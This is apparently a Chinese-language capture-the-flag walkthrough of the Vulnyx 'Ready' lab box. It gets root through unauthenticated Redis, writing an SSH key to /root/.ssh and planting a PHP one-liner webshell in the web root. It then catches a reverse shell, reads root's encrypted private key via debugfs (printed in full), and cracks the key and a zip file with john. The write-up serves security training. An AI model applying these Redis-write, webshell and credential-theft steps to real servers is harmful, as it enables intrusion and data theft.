Vulnyx-Ready-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.208  08:00:27:17:3e:c2       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e5:e5:eb       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.084 seconds (122.84 hosts/sec). 4 responded
❯ export ip=192.168.60.208
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.208:22
Open 192.168.60.208:80
Open 192.168.60.208:6379
Open 192.168.60.208:8080
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 12:02 CST
Initiating ARP Ping Scan at 12:02
Scanning 192.168.60.208 [1 port]
Completed ARP Ping Scan at 12:02, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:02
Completed Parallel DNS resolution of 1 host. at 12:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 12:02
Scanning 192.168.60.208 [4 ports]
Discovered open port 8080/tcp on 192.168.60.208
Discovered open port 6379/tcp on 192.168.60.208
Discovered open port 80/tcp on 192.168.60.208
Discovered open port 22/tcp on 192.168.60.208
Completed SYN Stealth Scan at 12:02, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.60.208
Host is up, received arp-response (0.00067s latency).
Scanned at 2025-02-26 12:02:38 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
6379/tcp open  redis      syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 08:00:27:17:3E:C2 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

发现存在80和8080端口，扫一下目录

发现什么也没有

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.208
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10705]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

❯ gobuster dir -u http://$ip:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.208:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10705]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

不过还额外开放了redis服务

---

写入ssh公钥

其实这个靶机放到现在做的话可以直接秒了

fscan扫一下可以利用redis写入root的公钥文件直接秒杀

❯ fscan -h $ip --rf ../.ssh/id_rsa.pub

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 192.168.60.208:80
[+] 端口开放 192.168.60.208:22
[+] 端口开放 192.168.60.208:6379
[+] 端口开放 192.168.60.208:8080
[+] 存活端口数量: 4
[*] 开始漏洞扫描...
[+] Redis扫描模块开始...
[*] 网站标题 http://192.168.60.208     状态码:200 长度:10705  标题:Apache2 Test Debian Default Page: It works
[*] 网站标题 http://192.168.60.208:8080 状态码:200 长度:10705  标题:Apache2 Test Debian Default Page: It works
[+] Redis 192.168.60.208:6379 发现未授权访问 文件位置:/root/dump.rdb
[+] Redis 192.168.60.208:6379 可写入路径 /root/.ssh/
[!] 扫描错误 192.168.60.208:22 - 扫描总时间超时: context deadline exceeded
[+] Redis 192.168.60.208:6379 SSH公钥写入成功
[+] Redis 192.168.60.208:6379 可写入路径 /var/spool/cron/
[+] 扫描已完成: 4/4
[*] 扫描结束,耗时: 11.095615855s
❯ ssh root@$ip -i .ssh/id_rsa
Warning: Identity file .ssh/id_rsa not accessible: No such file or directory.
The authenticity of host '192.168.60.208 (192.168.60.208)' can't be established.
ED25519 key fingerprint is SHA256:7e6nZsLIg3VH7MUpoakFpn75ysrvjz0K0YGrMGHcpLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.208' (ED25519) to the list of known hosts.
Linux ready 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64
Last login: Wed Jul 12 18:22:32 2023
root@ready:~# ls -al
total 32
drwx------  4 root root 4096 abr 18  2023 .
drwxr-xr-x 18 root root 4096 jul 19  2022 ..
lrwxrwxrwx  1 root root    9 jul 19  2022 .bash_history -> /dev/null
-rwx------  1 root root 3526 jul 19  2022 .bashrc
drwx------  3 root root 4096 jul 19  2022 .local
-rwx------  1 root root  161 jul  9  2019 .profile
-rw-------  1 root root  225 abr 18  2023 root.zip
-rw-r--r--  1 root root   66 abr 17  2023 .selected_editor
drwx------  2 root root 4096 feb 26 05:07 .ssh

---

用户提权

webshell写入

我们还是按照正常步骤来吧

redis可以设置dir为网页根目录

然后写入一句话木马进行反弹shell

6379 - Pentesting Redis - HackTricks

❯ redis-cli -h $ip -p 6379
192.168.60.208:6379> config set dir /usr/share/nginx/html
(error) ERR Changing directory: No such file or directory
192.168.60.208:6379> config set dir /var/www/html
OK
192.168.60.208:6379> CONFIG set dbfilename rev.php
OK
192.168.60.208:6379> set test "<?=`$_GET[0]`?>"
OK
192.168.60.208:6379> save

尝试执行一下

因为返回的是二进制数据，所有需要加--output -

❯ curl "192.168.60.208:8080/rev.php?0=id" --output -
REDIS0009       redis-ver6.0.16
redis-bits@ctimeused-memhP
aof-preamblexB
testuid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)
0%

尝试反弹一下shell

❯ pwncat-cs -lp 4444
[12:28:42] Welcome to pwncat 🐈!                           __main__.py:164
[12:29:09] received connection from 192.168.60.208:58708        bind.py:84
[12:29:10] 192.168.60.208:58708: registered new host w/ db  manager.py:957
(local) pwncat$
(remote) ben@ready:/var/www/html$

Root提权

拿到ben用户，发现隶属于disk组中，直接读私钥即可

(remote) ben@ready:/home/ben$ cat user.txt
e5d3f520423fdef77195ac688ecc27cb
(remote) ben@ready:/home/ben$ sudo -l
Matching Defaults entries for ben on ready:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ben may run the following commands on ready:
    (peter) NOPASSWD: /usr/bin/bash
(remote) ben@ready:/home/ben$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)

sudo是个烟雾弹，提到peter也没啥用

利用debugfs任意文件读取，不过root下的flag是个压缩包没法直接读

所有利用私钥ssh连接

(remote) ben@ready:/home/ben$ df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda1       6.9G  1.7G  4.9G  26% /
udev            473M     0  473M   0% /dev
tmpfs           489M     0  489M   0% /dev/shm
tmpfs            98M  488K   98M   1% /run
tmpfs           5.0M     0  5.0M   0% /run/lock
(remote) ben@ready:/home/ben$ debugfs /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs:  ls /root
debugfs:  cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,02E266E7A66462FE

tTN5G66QaZHsjOSYG8pFEQqUJUC4lw+WzHs3hbml1+zuLPmnDvUapYFB/4IgQNG2
jp1tebAwENVz/CdS3paB60NB9uosYXHa60Sbi7a31Ej6QqH10UnN/NROSEhqZkt+
dUcQspoDJIvHyvdhm4lIVizfvw1i9epxY+aB9W7vscpN1HAq37WdOn62nnEccLRs
wShZgOeOLTUo5j+C0oQZDi11ZJxEFiwwCFkOqZ+ZEQgshQqgG8PjMvedwuQcFjpN
wgFyQl0ZzGTzaj1iZntc/7G1/9WqXyk3IkpICucALCaSlCZ3Oh0kJd12W27vTKdO
kBpXNU8cgjc+jbIKveFZe6+ZuMwr3Lb9p+f+m7ktcTk/AFxSObuFnHBZN52VE/F4
lVK8vR7Om8qg34REgbvkmrBttg7x4AzUsTZ1WPPJqu3VS0SGVyq8vkpA2ngHmMBC
h3Ca0Xjua55GzCFBGePrQmqOd8jKZ0W6HBfCQyGB/dGg57mKNQy1OSIR4XtFYDYN
wNGTgr4KPebWf1CYRg2nleu3DD3sezutvoVMLJdzoeaLrCPX0pdfEhBase7n72Gy
Q6zqrk07p5GQeuL3tfhBsbHqgK899IMPr2VZPwvaoibDF66UJ1unfEXiPzTTHDo9
5MTR1GK7HYnmtypx3OpCDJMFGwaJgx+o944cxX9DQ63pgwx1R34RoQRfIgqUUrsG
NhEkLvrYFMnlK/dSmouuNFvd868zBlMByQyVYoepyHGhsGDuAP4Mhx7L1Gbj4dRS
dMgfgLN0lM0G+P9QvmmX7TuH1MU1IIfZZw9dCfdUqVVKyegA2RQ7fZG9D8o3l1J0
bIj0VJE7ykqqZEndzgBGRw3bEu3/OKpJM2UFqr/pPlu1w1bVIzHrTPNI5nk6dm77
n/TqwSgU2EQDWK88Z8TORZvuoNA3FelyzxCfRC2HLv0+QrVbyY7dLf3oLH0Zq+gK
1OYVrTKbe4pu0J2R7jZw20pLWeEZPuSE3RmVwcSsVzwb6dBk5rMkwCE5gG1qNh1U
koCqtHzXveisx5I7KrvBj5RTaK/aPX/v8BS/oh8AmiQr2Pqq9K+aQScP2XYh691x
yfVoFGJrZMcG5VD3QxrgWamgcHhug2LotpRbxjc777uK/muI9rUSQLYC06H2Cdf/
kRUH9Ohf3ZrVXpcCMhuCBbOxYBr+TAGjwJIBAYuFMBqhZ4gyaZhxJMCBhQOJHy6c
xR2cUdOAUh9lY40/o0Pwf+5GWiX2u5KmzcZ9iLdJ4NtgYiYMjGMe+0G37PdCXJvG
D+VsowoqCou916TMZUKpYSkzj8q3GLSib6CumVzKDesMLaYiZTOd1ShBqTlYjorp
Dlo5vrgUFk17OS8n0gtQuavBvN+2aM6gMOgiJrXfeLjzPGoY2ypHyNlbp/JI0/Y+
DfE+2kNqriAlvZps1mllIKITk1wNPQ3PVuBW9DkvrSUW7Ye+oMK3WoiQkY4qyu+2
pN0okmXmT5ygTq9KBQUEtjU8RnY27y34nYwCQus0HCA+FfRoxDbJYl0sN2g/Mzjq
PWVlSZLxzcya8sxPBA8gto3H5BxFnTxRXbCBTjTL09imi3QMl9K1emUlG8rSpBsI
-----END RSA PRIVATE KEY-----
debugfs:

添加私钥内容，尝试连接

发现私钥加密了

(remote) ben@ready:/home/ben$ chmod 600 id_rsa
(remote) ben@ready:/home/ben$ ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa':

复制到本地进行爆破即可 shelly

❯ vi id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
shelly           (id_rsa)
1g 0:00:00:00 DONE (2025-02-26 12:35) 100.0g/s 99200p/s 99200c/s 99200C/s marie1..babyface
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

利用scp传一下文件

爆破压缩包即可得到flag

❯ scp -i ../.ssh/id_rsa root@$ip:/root/root.zip .
root.zip                                 100%  225   217.6KB/s   00:00
❯ x root.zip
extract: extracting to root
Archive:  /home/Pepster/vulnyx/root.zip
[/home/Pepster/vulnyx/root.zip] root.txt password:
password incorrect--reenter: %
❯ zip2john root.zip >hash
ver 2.0 efh 5455 efh 7875 root.zip/root.txt PKZIP Encr: TS_chk, cmplen=43, decmplen=32, crc=68F3F801 ts=91CA cs=91ca type=8
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
already          (root.zip/root.txt)
1g 0:00:00:00 DONE (2025-02-26 12:38) 100.0g/s 2457Kp/s 2457Kc/s 2457KC/s christal..280789
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ x root.zip
extract: extracting to root
Archive:  /home/Pepster/vulnyx/root.zip
[/home/Pepster/vulnyx/root.zip] root.txt password:
  inflating: root.txt
❯ cat root.txt
cf537b04dd79e859816334b89e85c435%